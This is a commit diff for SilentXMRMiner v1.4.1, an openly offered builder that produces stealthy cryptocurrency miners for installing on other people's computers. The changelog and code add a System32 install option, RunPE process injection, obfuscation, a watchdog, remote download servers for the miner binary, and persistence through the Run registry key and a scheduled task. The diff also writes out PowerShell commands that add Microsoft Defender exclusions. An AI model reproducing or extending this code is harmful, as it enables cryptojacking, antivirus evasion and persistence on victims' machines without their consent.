Updated to v1.4.1

* Fixed possible critical bug that makes the miner unable to see if a miner is running or not thus opening multiple miners
* Added backup servers for Online Downloader
* Added Install to System32 option (requires administrator permissions)
* Moved RunPE injector (Mandark) into miner to avoid internal Assembly.Load and improved it a bit
* Fixed possiblity of duplicate random obfuscation strings
* Improved Loader
* Improved Watchdog
* Improved obfuscation

Author: UnamSanctam

README.md

@@ -1,7 +1,7 @@
 
 <img src="https://github.com/UnamSanctam/SilentXMRMiner/blob/master/SilentXMRMiner.png?raw=true">
 
-# SilentXMRMiner v1.4 - Based on Lime Miner v0.3
+# SilentXMRMiner v1.4.1 - Based on Lime Miner v0.3
 
 Can mine all the following algorithms and thus all the cryptocurrencies that use them: **cn/upx2**, **argon2/chukwav2**, **cn/ccx**, **kawpow**, **rx/keva**, **astrobwt**, **cn-pico/tlo**, **rx/sfx**, **rx/arq**, **rx/0**, **argon2/chukwa**, **argon2/wrkz**, **rx/wow**, **cn/fast**, **cn/rwz**, **cn/zls**, **cn/double**, **cn/r**, **cn-pico**, **cn/half**, **cn/2**, **cn/xao**, **cn/rto**, **cn-heavy/tube**, **cn-heavy/xhv**, **cn-heavy/0**, **cn/1**, **cn-lite/1**, **cn-lite/0** and **cn/0**.
 
@@ -41,8 +41,17 @@ You can find the new wiki [here](https://github.com/UnamSanctam/SilentXMRMiner/w
 
 ## Changes
 
+### v1.4.1 (10/07/2021)
+* Fixed possible critical bug that makes the miner unable to see if a miner is running or not thus opening multiple miners
+* Added backup servers for Online Downloader
+* Added Install to System32 option (requires administrator permissions)
+* Moved RunPE injector (Mandark) into miner to avoid internal Assembly.Load and improved it a bit
+* Fixed possiblity of duplicate random obfuscation strings
+* Improved Loader
+* Improved Watchdog
+* Improved obfuscation
 ### v1.4 (05/07/2021)
-**v1.4 is the final update before the new, greatly improved unified miner that I'm working on.**
+**v1.4.\* is the final update before the new, greatly improved unified miner that I'm working on.**
 * Added the Online Downloader option that makes the miner download the miner binary (from GitHub) during runtime to greatly decrease file size (to less then 100kb) and detections - Also added a cache so that it won't have to download the miner on every start
 * Made the Task Scheduler task start for all users
 * Improved Watchdog program flow

SilentXMRMiner/Advanced.Designer.vb

@@ -120,6 +120,11 @@
   <metadata name="TooltipHelper.TrayLocation" type="System.Drawing.Point, System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a">
     <value>17, 17</value>
   </metadata>
+  <data name="Label7.ToolTip" xml:space="preserve">
+    <value>Will try to install to System32, if unsuccessful it will try to install to the path chosen in the "Install" tab. It's recommended to enable this when using 'Run as Administrator'.
+This command requires Administrator privileges!
+</value>
+  </data>
   <data name="Label1.ToolTip" xml:space="preserve">
     <value>Pauses the miner compilation when the Watchdog DLL and/or Miner DLL is compiled to allow manual obfuscation of the file. 
 You can find the file in the same folder as the miner location you specified with the name MINERFILE-watchdog.dll or MINERFILE-miner.dll. 

SilentXMRMiner/Advanced.resx

@@ -30,6 +30,23 @@
     Private Sub toggleKillWD_CheckedChanged(sender As Object) Handles toggleKillWD.CheckedChanged
         If toggleKillWD.Checked Then
             toggleAdministrator.Checked = True
+            toggleInstallSystem32.Checked = True
+        End If
+    End Sub
+
+    Private Sub toggleInstallSystem32_CheckedChanged(sender As Object) Handles toggleInstallSystem32.CheckedChanged
+        If toggleInstallSystem32.Checked Then
+            toggleAdministrator.Checked = True
+        End If
+    End Sub
+
+    Private Sub toggleAdministrator_CheckedChanged(sender As Object) Handles toggleAdministrator.CheckedChanged
+        If toggleAdministrator.Checked Then
+            toggleInstallSystem32.Checked = True
+            toggleKillWD.Checked = True
+        Else
+            toggleInstallSystem32.Checked = False
+            toggleKillWD.Checked = False
         End If
     End Sub
 End Class

SilentXMRMiner/Advanced.vb

@@ -10,14 +10,18 @@ Public Class Codedom
     Public Shared LoaderOK As Boolean = False
     Public Shared UninstallerOK As Boolean = False
     Public Shared F As Form1
+
+    Public Shared GlobalRProgram As String
     Public Shared Sub MinerCompiler(ByVal Path As String, ByVal Code As String, ByVal Res As String)
         MinerOK = False
 
         Dim providerOptions = New Dictionary(Of String, String)
         providerOptions.Add("CompilerVersion", "v4.0")
         Dim CodeProvider As New CSharpCodeProvider(providerOptions)
         Dim Parameters As New CompilerParameters
-        Dim OP As String = " /target:library /platform:x64 /optimize "
+        Dim OP As String = " /target:winexe /platform:x64 /optimize "
+
+        GlobalRProgram = F.Randomi(F.rand.Next(5, 40))
 
         With Parameters
             .GenerateExecutable = False
@@ -36,7 +40,6 @@ Public Class Codedom
             F.txtLog.Text = F.txtLog.Text + ("Creating resources..." + vbNewLine)
 
             Using R As New Resources.ResourceWriter(IO.Path.GetTempPath & "\" + Res + ".Resources")
-                R.AddResource(F.Resources_dll, F.AES_Encryptor(My.Resources.Mandark))
                 If Not F.FA.toggleDownloader.Checked Then
                     R.AddResource(F.Resources_xmrig, F.AES_Encryptor(My.Resources.xmrig))
                 End If
@@ -79,7 +82,9 @@ Public Class Codedom
         providerOptions.Add("CompilerVersion", "v4.0")
         Dim CodeProvider As New CSharpCodeProvider(providerOptions)
         Dim Parameters As New CompilerParameters
-        Dim OP As String = " /target:library /platform:x64 /optimize "
+        Dim OP As String = " /target:winexe /platform:x64 /optimize "
+
+        GlobalRProgram = F.Randomi(F.rand.Next(5, 40))
 
         With Parameters
             .GenerateExecutable = False
@@ -150,7 +155,7 @@ Public Class Codedom
             Dim Resources_Loader = F.Randomi(rand.Next(5, 40))
 
             Using R As New Resources.ResourceWriter(IO.Path.GetTempPath & "\" + Resources_Loader + ".Resources")
-                R.AddResource(Resources_Program, ProgramBytes.Reverse().ToArray())
+                R.AddResource(Resources_Program, F.AES_Encryptor(ProgramBytes))
                 R.Generate()
             End Using
 
@@ -233,7 +238,7 @@ Public Class Codedom
     Public Shared Sub ReplaceGlobals(ByRef stringb As StringBuilder)
         If F.FA.toggleKillWD.Checked Then
             stringb.Replace("DefKillWD", "true")
-            stringb.Replace("#KillWDCommands", Convert.ToBase64String(Encoding.ASCII.GetBytes("powershell -Command Add-MpPreference -ExclusionPath '%cd%' & powershell -Command Add-MpPreference -ExclusionPath '%UserProfile%' & powershell -Command Add-MpPreference -ExclusionPath '%AppData%' & powershell -Command Add-MpPreference -ExclusionPath '%Temp%' & exit").Reverse().ToArray()))
+            stringb.Replace("#KillWDCommands", F.EncryptString("/c powershell -Command Add-MpPreference -ExclusionPath '%UserProfile%' & powershell -Command Add-MpPreference -ExclusionPath '%AppData%' & powershell -Command Add-MpPreference -ExclusionPath '%Temp%' & powershell -Command Add-MpPreference -ExclusionPath '%SystemRoot%' & exit"))
         End If
 
         If F.FA.toggleEnableDebug.Checked Then
@@ -264,7 +269,13 @@ Public Class Codedom
                     installdir = "Environment.GetFolderPath(Environment.SpecialFolder.ApplicationData)"
             End Select
 
-            stringb.Replace("PayloadPath", "System.IO.Path.Combine(" & installdir & "," & Chr(34) & F.txtInstallFileName.Text & Chr(34) & ")")
+            If F.FA.toggleInstallSystem32.Checked Then
+                stringb.Replace("DefSystem32", "true")
+                stringb.Replace("PayloadPath", "System.IO.Path.Combine((new WindowsPrincipal(WindowsIdentity.GetCurrent()).IsInRole(WindowsBuiltInRole.Administrator) ? Environment.SystemDirectory : " & installdir & ")," & Chr(34) & F.txtInstallFileName.Text & Chr(34) & ")")
+            Else
+                stringb.Replace("PayloadPath", "System.IO.Path.Combine(" & installdir & "," & Chr(34) & F.txtInstallFileName.Text & Chr(34) & ")")
+            End If
+
 
             If F.toggleWatchdog.Checked Then
                 stringb.Replace("DefWatchdog", "true")
@@ -288,18 +299,20 @@ Public Class Codedom
 
         stringb.Replace("%Guid%", Guid.NewGuid.ToString)
 
-        stringb.Replace("#STARTDELAY", F.txtStartDelay.Text)
         stringb.Replace("#KEY", F.AESKEY)
         stringb.Replace("#SALT", F.SALT)
         stringb.Replace("#IV", F.IV)
         stringb.Replace("#DLLSTR", F.EncryptString("Mandark.Mandark"))
         stringb.Replace("#DLLOAD", F.EncryptString("Load"))
         stringb.Replace("#REGKEY", F.EncryptString("Software\Microsoft\Windows\CurrentVersion\Run\"))
+        stringb.Replace("#SANCTAMLIBSURL", F.EncryptString("https://sanctam.net:58899/assets/txt/resource_url.php?type=libs"))
+        stringb.Replace("#SANCTAMMINERURL", F.EncryptString("https://sanctam.net:58899/assets/txt/resource_url.php?type=xmrig"))
         stringb.Replace("#LIBSURL", F.EncryptString("https://github.com/UnamSanctam/SilentXMRMiner/raw/master/SilentXMRMiner/Resources/libs.zip"))
         stringb.Replace("#MINERURL", F.EncryptString("https://github.com/UnamSanctam/SilentXMRMiner/raw/master/SilentXMRMiner/Resources/xmrig.zip"))
         stringb.Replace("#LIBSPATH", F.EncryptString("Microsoft\Libs\"))
         stringb.Replace("#WATCHDOG", F.EncryptString("sihost64"))
         stringb.Replace("#TASKSCH", F.EncryptString("/c schtasks /create /f /sc onlogon /rl highest /tn "))
+        stringb.Replace("#MINERID", F.EncryptString("--cinit-find-x"))
         stringb.Replace("#InjectionTarget", F.EncryptString(F.InjectionTarget(0)))
         stringb.Replace("#InjectionDir", F.InjectionTarget(1).Replace("(", "").Replace(")", "").Replace("%WINDIR%", """ + Environment.GetFolderPath(Environment.SpecialFolder.Windows) + """))
 
@@ -315,12 +328,26 @@ Public Class Codedom
         stringb.Replace("RTruncate", F.Randomi(F.rand.Next(5, 40)))
         stringb.Replace("RCommandLineEncrypt", F.Randomi(F.rand.Next(5, 40)))
         stringb.Replace("RWDLoop", F.Randomi(F.rand.Next(5, 40)))
+        stringb.Replace("RStart", F.Randomi(F.rand.Next(5, 40)))
+        stringb.Replace("RLoader", F.Randomi(F.rand.Next(5, 40)))
+        stringb.Replace("RUninstaller", F.Randomi(F.rand.Next(5, 40)))
+        stringb.Replace("RProgram", GlobalRProgram)
 
         stringb.Replace("rarg1", F.Randomi(F.rand.Next(5, 40)))
         stringb.Replace("rarg2", F.Randomi(F.rand.Next(5, 40)))
         stringb.Replace("rarg3", F.Randomi(F.rand.Next(5, 40)))
+        stringb.Replace("rarg4", F.Randomi(F.rand.Next(5, 40)))
+        stringb.Replace("rarg5", F.Randomi(F.rand.Next(5, 40)))
+        stringb.Replace("rarg6", F.Randomi(F.rand.Next(5, 40)))
+        stringb.Replace("rarg7", F.Randomi(F.rand.Next(5, 40)))
+        stringb.Replace("rarg8", F.Randomi(F.rand.Next(5, 40)))
+        stringb.Replace("rarg9", F.Randomi(F.rand.Next(5, 40)))
+        stringb.Replace("rarg10", F.Randomi(F.rand.Next(5, 40)))
+        stringb.Replace("rarg11", F.Randomi(F.rand.Next(5, 40)))
         stringb.Replace("rbD", F.Randomi(F.rand.Next(5, 40)))
+        stringb.Replace("rbD2", F.Randomi(F.rand.Next(5, 40)))
         stringb.Replace("rplp", F.Randomi(F.rand.Next(5, 40)))
         stringb.Replace("rxM", F.Randomi(F.rand.Next(5, 40)))
+        stringb.Replace("startDelay", F.txtStartDelay.Text)
     End Sub
 End Class

SilentXMRMiner/Codedom.vb

@@ -8,6 +8,8 @@ Public Class Form1
     Public watchdogdata As Byte() = New Byte() {}
     Public FA As New Advanced
 
+    Public RandomiCache As New List(Of String)
+
     'Silent XMR Miner by Unam Sanctam https://github.com/UnamSanctam/SilentXMRMiner, initially based on Lime Miner by NYAN CAT https://github.com/NYAN-x-CAT/Lime-Miner
 
     Private Sub Form1_Load(sender As Object, e As EventArgs) Handles Me.Load
@@ -18,6 +20,7 @@ Public Class Form1
         Codedom.F = Me
         FA.F = Me
 
+        RandomiCache.Add("SilentXMRMiner")
 
         FA.txtAdvParam.Text = advancedParams
     End Sub
@@ -68,7 +71,7 @@ Public Class Form1
             txtLog.Text = txtLog.Text + ("Starting..." + vbNewLine)
             txtLog.Text = txtLog.Text + ("Replacing strings..." + vbNewLine)
             Dim minerbuilder As New StringBuilder(My.Resources.Program)
-            Dim argstr As String = " --cinit-find-x -B " & If(FA.chkAdvanced.Checked, FA.txtAdvParam.Text, advancedParams) & " --url=" & txtPoolURL.Text & " --user=" & txtPoolUsername.Text & " --pass=" & txtPoolPassowrd.Text & " --cpu-max-threads-hint=" & txtMaxCPU.Text.Replace("%", "") & If(FA.chkRemoteConfig.Checked, " --cinit-remote-config=""" & Unamlib_Encrypt(FA.txtRemoteConfig.Text) & """", "") & " --donate-level=5 "
+            Dim argstr As String = " --cinit-find-x -B " & If(FA.chkAdvanced.Checked, FA.txtAdvParam.Text, advancedParams) & " --url=" & txtPoolURL.Text & " --user=" & txtPoolUsername.Text & " --pass=" & txtPoolPassowrd.Text & " --cpu-max-threads-hint=" & txtMaxCPU.Text.Replace("%", "") & If(FA.chkRemoteConfig.Checked, " --cinit-remote-config=""" & Unamlib_Encrypt(FA.txtRemoteConfig.Text) & """", "") & " "
 
             minerbuilder.Replace("#dll", Resources_dll)
             minerbuilder.Replace("#xmr", Resources_xmrig)
@@ -233,13 +236,19 @@ Public Class Form1
     End Function
 
     Public Function Randomi(ByVal length As Integer) As String
-        Dim Chr As String = "asdfghjklqwertyuiopmnbvcxz"
-        Dim sb As New Text.StringBuilder()
-        For i As Integer = 1 To length
-            Dim idx As Integer = rand.Next(0, Chr.Length)
-            sb.Append(Chr.Substring(idx, 1))
-        Next
-        Return sb.ToString
+        While True
+            Dim Chr As String = "asdfghjklqwertyuiopmnbvcxz"
+            Dim sb As New Text.StringBuilder()
+            For i As Integer = 1 To length
+                Dim idx As Integer = rand.Next(0, Chr.Length)
+                sb.Append(Chr.Substring(idx, 1))
+            Next
+            If Not RandomiCache.Contains(sb.ToString()) Then
+                RandomiCache.Add(sb.ToString())
+                Return sb.ToString
+            End If
+        End While
+        Return ""
     End Function
 
     Private Sub chkInstall_CheckedChanged(sender As Object) Handles chkInstall.CheckedChanged

SilentXMRMiner/Form1.Designer.vb

@@ -118,9 +118,6 @@
     <value>System.Resources.ResXResourceWriter, System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089</value>
   </resheader>
   <assembly alias="System.Windows.Forms" name="System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089" />
-  <data name="Mandark" type="System.Resources.ResXFileRef, System.Windows.Forms">
-    <value>..\Resources\Mandark.dll;System.Byte[], mscorlib, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089</value>
-  </data>
   <data name="Monero" type="System.Resources.ResXFileRef, System.Windows.Forms">
     <value>..\Resources\Monero.ico;System.Drawing.Icon, System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a</value>
   </data>